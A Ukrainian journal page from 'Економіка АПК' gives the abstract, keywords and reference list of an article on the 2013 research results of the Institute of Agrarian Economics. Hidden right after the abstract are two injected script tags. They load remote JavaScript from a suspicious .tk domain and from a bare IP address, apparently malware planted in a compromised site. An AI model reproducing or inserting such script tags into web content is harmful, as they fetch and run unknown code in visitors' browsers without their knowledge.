ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 001.18.001.12
Наукове забезпечення розвитку агропромислового комплексу

Основні результати наукових досліджень Національного наукового центру «Інститут аграрної економіки» за 2013 рік та завдання на перспективу / // Економіка АПК. - 2014. - № 3 - С. 5

Представлено результати наукової роботи Національного наукового центру «Інститут аграрної економіки» за 2013 р відповідно до напрямів: теоретичні і методологічні засади забезпечення сталого соціально-економічного розвитку сільських територій; наукові засади забезпечення конкурентоспроможності господарських формувань і галузей в аграрному секторі економіки України та розвитку земельних відносин; теоретико-методичні засади ціноутворення, відтворення основних засобів і розвитку ринку сільськогосподарської продукції та продовольства на інноваційній основі; науково-методологічні засади фінансового, інвестиційного та облікового забезпечення конкурентоспроможного аграрного виробництва. Акцентовано увагу на дослідженнях з найактуальніших проблем аграрного сектору: розбудови інституціонального забезпечення розвитку сільськогосподарського підприємництва і кооперації, трансформації земельних відносин, забезпечення розвитку сільських громад і територій, фінансового забезпечення галузі та ін. Окреслено пріоритетні напрями наукових досліджень Інституту на 2014 р.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: інституційне забезпечення розвитку підприємництва і кооперації, стратегія розвитку сільських територій та громад, кластерна організація та стратегічне управління комплексним розвитком агропромислового виробництва та сільських територій, ринкова трансформація земельних відносин, організаційно-економічний механізм ціноутворення на сільськогосподарську продукцію, концептуальні засади податково-бюджетної політики у сфері агропромислового виробництва, фізіократична доктрина розвитку бухгалтерського обліку

Список використаних джерел

 1. Дем’яненко М. Я. Державне фінансування аграрного сектору АПК (моніторинг бюджетних програм за 2002-2013 роки) / Дем’яненко М.Я., Шолойко А.С. – К. : ННЦ ІАЕ, 2013. – 120 с.
 2. Ємність внутрішнього споживчого ринку сільськогосподарської продукції та продовольства: монографія / [Шпичак О.М., Лупенко Ю.О., Жук В.М. та ін.]; за ред. О.М. Шпичака. – К. : ННЦ ІАЕ, 2013. – 186 с.
 3. Зерновий сільськогосподарський обслуговуючий кооператив: практичний посібник / [Ю.О. Лупенко, М.Й. Малік, Г.В. Новіков, Р.Я. Корінець]. – К.: ННЦ ІАЕ, 2013. – 122 с.
 4. Інвестиційний проект створення міні-свиноферми в особистому селянському господарстві / М.І. Кісіль, Д.С. Черненко. – К.: ННЦ „ІАЕ”, 2013. – 67 с.
 5. Машинно-технологічний сільськогосподарський обслуговуючий кооператив та міжгосподарське використання техніки : практичний посібник / [Лупенко Ю.О., Малік М.Й., Корінець Р.Я. та ін.]. – К.: ННЦ ІАЕ, 2013. – 74 с.
 6. Методичні рекомендації з обґрунтування нормативної потреби основних засобів на виробництво сільськогосподарської продукції / Г.М. Підлісецький, М.І. Герун, В.В. Гаркавий, О.В. Вишневецька. – К. : ННЦ „ІАЕ”, 2013. – 52 с.
 7. Обліково-аудиторське забезпечення розвитку земельних відносин: Колективна монографія / В.М. Жук, Ю.С. Бездушна, Б.В. Мельничук, Н.Л. Жук, С.М. Остапчук. – К.: ННЦ „Інститут аграрної економіки”, 2013. – 238 с.
 8. Підвищення конкурентоспроможності та соціальної спрямованості агропромислового виробництва на основі розвитку кластерних систем / [за ред. Ю.О. Лупенка, М.Ф. Кропивка, М.Й. Маліка та ін.]. – К. : ННЦ „ІАЕ”, 2013. – 40 с.
 9. Прогнозування виробництва продукції рослинництва та його ресурсне забезпечення в Україні / С.М. Кваша, М.М. Ільчук, І.А. Коновал, М.М. Федюшко. – К. : ННЦ „ІАЕ”, 2013. – 244 с.
 10. Програма розвитку особистих селянських господарств в Україні на період до 2020 року (проект) / за ред. Ю.О. Лупенка, М.Й. Маліка. – К. : ННЦ „ІАЕ”, 2013. – 28 с.
 11. Розвиток аграрних холдингових формувань та заходи з посилення соціальної спрямованості їхньої діяльності / [Лупенко Ю.О., Кропивко М.Ф., Малік М.Й. та ін.] ; за ред. М.Ф. Кропивка. – К.: ННЦ ІАЕ, 2013. – 50 с.
 12. Собівартість продукції, її дохідність та рентабельність в сільськогосподарських підприємствах України, що очікуються в 2013 році (методика і розрахунки) / В.Я. Месель-Веселяк, О.Ю. Грищенко, М.П. Душко, Ю.В. Волосюк. – К.: ННЦ „ІАЕ”, 2013. – 104 с.
 13. Стратегічні напрями матеріально-технічного забезпечення сільського господарства України на період до 2020 року / [Підлісецький Г.М., Могилова М.М., Білоусько Я.К. та ін.]; за ред. Ю.О. Лупенка, Г.М. Підлісецького. – К.: ННЦ „ІАЕ”, 2013. – 46 с.
 14. Стратегічні напрями податкового регулювання розвитку аграрного сектору економіки України на період до 2020 року / Ю.О. Лупенко, Л.Д. Тулуш. – К. : ННЦ „ІАЕ”, 2013. – 38 с.
 15. Стратегічні напрями розвитку підприємництва і кооперації в сільському господарстві на період до 2020 року / [Ю. О. Лупенко, М. Й. Малік, В. М. Заяць та ін.]; за ред. М. Й. Маліка. – К. : ННЦ „ІАЕ”, 2013. – 50 с.
 16. Стратегічні напрями сталого розвитку сільських територій на період до 2020 року / [Лупенко Ю.О., Малік М.Й., Булавка О.Г. та ін.] ; за ред. Ю.О. Лупенка та О.Г. Булавки. – К. : ННЦ ІАЕ, 2013. – 74 с.
Читати статтю: 14_03_5-12.pdf